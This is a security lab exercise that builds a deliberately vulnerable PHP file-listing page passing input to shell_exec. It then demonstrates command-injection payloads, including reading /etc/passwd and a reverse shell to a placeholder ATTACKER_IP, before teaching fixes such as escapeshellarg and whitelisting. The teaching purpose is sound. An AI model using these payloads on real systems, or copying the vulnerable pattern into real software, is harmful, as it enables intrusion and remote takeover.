Exercise 33: Insufficient Input Validation (Command Line Arguments)

Objective

Learn how to exploit Insufficient Input Validation vulnerabilities when user input is passed directly as command-line arguments to a web server or application. Understand how to prevent such vulnerabilities through secure input validation and avoiding direct execution of user inputs.

---

Scenario

You are assessing a web application that accepts user input and passes it directly to a shell command without proper validation. This oversight allows attackers to inject malicious commands, potentially leading to Remote Code Execution (RCE).

---

Lab Setup

Prerequisites:

• Basic knowledge of PHP and Linux command-line operations.
• XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
• A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

1. PHP Script with Command Execution Vulnerability
   • Create a file files.php: <?php if (isset($_GET['filename'])) { $filename = $_GET['filename']; $output = shell_exec("ls -l " . $filename); echo "<pre>$output</pre>"; } else { echo "<h2>Please provide a filename.</h2>"; } ?> <h2>File Listing Tool</h2> <form method="GET" action=""> Filename: <input type="text" name="filename" required><br> <button type="submit">List File</button> </form>
2. Running the Application
   • Start the Apache server.
   • Place files.php in the web server’s root directory (htdocs for XAMPP).
   • Open http://localhost/files.php in your browser.

---

Exploitation Steps

Step 1: Injecting Arbitrary Commands

1. In the Filename field, enter the following payload: ; whoami
2. Expected Result:
   • The output displays the user under which the web server is running (e.g., www-data or apache).

Step 2: Reading Sensitive Files

1. Enter the payload: ; cat /etc/passwd
2. Expected Result:
   • The server displays the contents of /etc/passwd, exposing sensitive system information.

Step 3: Establishing a Reverse Shell (Advanced)

1. Input a reverse shell payload (replace ATTACKER_IP and PORT): ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
2. Expected Result:
   • The attacker gains shell access to the server.

---

Solution and Prevention

Problem Analysis

• User input is passed directly to the shell command without validation, enabling command injection.

Fixing the Vulnerability

1. Sanitize User Input
   • Use escapeshellarg() to escape user input: $filename = escapeshellarg($_GET['filename']); $output = shell_exec("ls -l " . $filename); echo "<pre>$output</pre>";
2. Avoid Direct Shell Execution
   • Replace shell commands with built-in functions: $filename = $_GET['filename']; if (file_exists($filename)) { echo "<h2>File exists: $filename</h2>"; } else { echo "<h2>File not found.</h2>"; }
3. Whitelist Valid Inputs
   • Allow only specific filenames or directories: $allowed_files = ['file1.txt', 'file2.txt']; if (in_array($_GET['filename'], $allowed_files)) { $filename = escapeshellarg($_GET['filename']); $output = shell_exec("ls -l " . $filename); echo "<pre>$output</pre>"; } else { echo "<h2>Invalid file request.</h2>"; }
4. Use Least Privilege Principle
   • Run the web server with the least privileges to minimize the impact of exploitation.
5. Disable Dangerous PHP Functions
   • Disable shell_exec, exec, and related functions in php.ini: disable_functions = shell_exec, exec, system, passthru

---

Testing After Fix

1. Attempt to inject ; whoami into the filename field.
2. Expected Result:
   • The input is either sanitized or blocked, and no command execution occurs.
3. Attempt to input ; cat /etc/passwd.
4. Expected Result:
   • The server rejects the input or returns a safe error message.

---

Conclusion

In this lab, you exploited Insufficient Input Validation by injecting commands through unsanitized input, gaining access to sensitive information. You also learned how to mitigate these risks by sanitizing input, avoiding direct shell execution, implementing input whitelisting, and applying the principle of least privilege.